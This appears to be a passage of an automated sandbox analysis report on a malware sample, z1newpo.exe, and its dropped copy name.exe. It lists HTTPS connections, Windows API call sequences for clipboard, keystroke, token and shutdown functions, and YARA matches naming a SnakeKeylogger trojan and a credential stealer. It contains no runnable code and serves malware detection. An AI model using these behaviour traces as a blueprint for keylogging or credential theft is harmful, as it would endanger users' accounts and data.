                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49726 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49739 version: TLS 1.2
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0045A10F
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_0045A10F
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,12_2_0045A10F
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046DC80
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput,0_2_0044C37A
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C81C
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_0047C81C
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,12_2_0047C81C

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 3.2.RegSvcs.exe.370000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 3.2.RegSvcs.exe.370000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 12.2.name.exe.12d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 12.2.name.exe.12d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 12.2.name.exe.12d0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 2.2.name.exe.ba0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 2.2.name.exe.ba0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 2.2.name.exe.ba0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 2.2.name.exe.ba0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 2.2.name.exe.ba0000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 2.2.name.exe.ba0000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 12.2.name.exe.12d0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 12.2.name.exe.12d0000.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 12.2.name.exe.12d0000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0000000C.00000002.1396488474.00000000012D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 00000002.00000002.1258375623.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 00000003.00000002.3684808762.000000000037C000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: name.exe PID: 788, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: RegSvcs.exe PID: 3636, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: name.exe PID: 6540, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,2_2_004333BE
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,12_2_004333BE
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_004096A00_2_004096A0
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0042200C0_2_0042200C
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0041A2170_2_0041A217
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_004122160_2_00412216
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0042435D0_2_0042435D
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_004033C00_2_004033C0
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0044F4300_2_0044F430
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_004125E80_2_004125E8
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0044663B0_2_0044663B
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_004138010_2_00413801
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0042096F0_2_0042096F
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_004129D00_2_004129D0
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_004119E30_2_004119E3
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0041C9AE0_2_0041C9AE
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0047EA6F0_2_0047EA6F
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0040FA100_2_0040FA10
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0044EB5F0_2_0044EB5F
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_00423C810_2_00423C81
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_00411E780_2_00411E78
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_00442E0C0_2_00442E0C
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_00420EC00_2_00420EC0
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0044CF170_2_0044CF17
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_00444FD20_2_00444FD2
                    Source: C:\Users\user\Desktop\z1newpo.exeCode function: 0_2_0426D6700_2_0426D670
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_004096A02_2_004096A0
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0042200C2_2_0042200C
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0041A2172_2_0041A217
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_004122162_2_00412216
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0042435D2_2_0042435D
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_004033C02_2_004033C0
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0044F4302_2_0044F430
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_004125E82_2_004125E8
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0044663B2_2_0044663B
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_004138012_2_00413801
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0042096F2_2_0042096F
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_004129D02_2_004129D0
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_004119E32_2_004119E3
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0041C9AE2_2_0041C9AE
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0047EA6F2_2_0047EA6F
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0040FA102_2_0040FA10
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0044EB5F2_2_0044EB5F
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00423C812_2_00423C81
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00411E782_2_00411E78
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00442E0C2_2_00442E0C
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00420EC02_2_00420EC0
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0044CF172_2_0044CF17
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_00444FD22_2_00444FD2
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 2_2_0411F6302_2_0411F630
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0245D2783_2_0245D278
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_024553623_2_02455362
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0245C1483_2_0245C148
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0245F6403_2_0245F640
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0245C7383_2_0245C738
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0245CA083_2_0245CA08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0245E9883_2_0245E988
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_024569B03_2_024569B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02453E183_2_02453E18
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0245CFAA3_2_0245CFAA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0245CCD83_2_0245CCD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02459DE03_2_02459DE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0245F6313_2_0245F631
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0245FA883_2_0245FA88
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0245FA983_2_0245FA98
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_02453AA13_2_02453AA1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0245E97A3_2_0245E97A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_024529EC3_2_024529EC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06031E803_2_06031E80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_060317A03_2_060317A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06039C6D3_2_06039C6D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_060395483_2_06039548
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06030B303_2_06030B30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_060350283_2_06035028
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_060329683_2_06032968
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0603DE003_2_0603DE00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06031E703_2_06031E70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0603E6AF3_2_0603E6AF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0603E6B03_2_0603E6B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0603EF513_2_0603EF51
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0603EF603_2_0603EF60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0603178F3_2_0603178F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0603FC583_2_0603FC58
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0603FC683_2_0603FC68
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0603CCA03_2_0603CCA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0603D5403_2_0603D540
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0603D5503_2_0603D550
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0603DDFF3_2_0603DDFF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0603E24A3_2_0603E24A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0603E2583_2_0603E258
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0603EAF83_2_0603EAF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0603EB083_2_0603EB08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06030B203_2_06030B20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_06038BA03_2_06038BA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0603F3B83_2_0603F3B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0603F8023_2_0603F802
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_060300063_2_06030006
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0603F8103_2_0603F810
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_060350183_2_06035018
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_060300403_2_06030040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0603D0F83_2_0603D0F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0603D9993_2_0603D999
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0603D9A83_2_0603D9A8
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_004096A012_2_004096A0
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_0042200C12_2_0042200C
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_0041A21712_2_0041A217
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_0041221612_2_00412216
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_0042435D12_2_0042435D
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_004033C012_2_004033C0
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_0044F43012_2_0044F430
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_004125E812_2_004125E8
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_0044663B12_2_0044663B
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_0041380112_2_00413801
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_0042096F12_2_0042096F
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_004129D012_2_004129D0
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_004119E312_2_004119E3
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_0041C9AE12_2_0041C9AE
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_0047EA6F12_2_0047EA6F
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_0040FA1012_2_0040FA10
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_0044EB5F12_2_0044EB5F
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_00423C8112_2_00423C81
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_00411E7812_2_00411E78
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_00442E0C12_2_00442E0C
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_00420EC012_2_00420EC0
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_0044CF1712_2_0044CF17
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_00444FD212_2_00444FD2
                    Source: C:\Users\user\AppData\Local\directory\name.exeCode function: 12_2_041D9A8812_2_041D9A88
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_008DA08813_2_008DA088
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_008DC14613_2_008DC146
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_008DD27813_2_008DD278
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_008D536213_2_008D5362
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_008DC46A13_2_008DC46A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_008DC73813_2_008DC738
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_008DE98813_2_008DE988
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_008D69A013_2_008D69A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_008D39ED13_2_008D39ED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_008DCA0813_2_008DCA08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_008DCCD813_2_008DCCD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_008D3E0913_2_008D3E09
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_008DCFA913_2_008DCFA9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_008D6FC813_2_008D6FC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_008DF63113_2_008DF631
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_008D29EC13_2_008D29EC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_008DE97A13_2_008DE97A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_008DFA8813_2_008DFA88
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_05FF954813_2_05FF9548
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_05FF9C1813_2_05FF9C18
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_05FF17A013_2_05FF17A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_05FF1E8013_2_05FF1E80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_05FF296813_2_05FF2968
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_05FF502813_2_05FF5028
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_05FF0B3013_2_05FF0B30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_05FFDDFF13_2_05FFDDFF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_05FFD55013_2_05FFD550
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_05FFD54013_2_05FFD540
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_05FFCCA013_2_05FFCCA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_05FFCC8F13_2_05FFCC8F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_05FFFC6813_2_05FFFC68
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_05FFFC5813_2_05FFFC58
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_05FF178F13_2_05FF178F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_05FFEF6013_2_05FFEF60
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_05FFEF5113_2_05FFEF51
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_05FFE6B013_2_05FFE6B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_05FFE6AF13_2_05FFE6AF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_05FF1E7013_2_05FF1E70
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_05FFDE0013_2_05FFDE00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_05FFD9A813_2_05FFD9A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_05FFD99913_2_05FFD999
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_05FF295A13_2_05FF295A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_05FFD0F813_2_05FFD0F8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_05FF004013_2_05FF0040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_05FF501813_2_05FF5018
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 13_2_05FF001613_2_05FF0016
